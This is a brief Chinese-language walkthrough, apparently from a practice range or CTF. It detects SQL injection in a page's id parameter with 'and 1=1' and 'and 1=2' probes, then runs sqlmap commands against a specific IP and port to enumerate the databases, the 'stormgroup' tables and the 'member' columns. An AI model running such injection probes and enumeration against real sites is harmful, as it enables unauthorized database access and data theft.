时间:2022-03-14 10:04:18 | 栏目:Mysql | 点击:次
地址栏输入 and 1=1 发现页面正常显示。

再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns




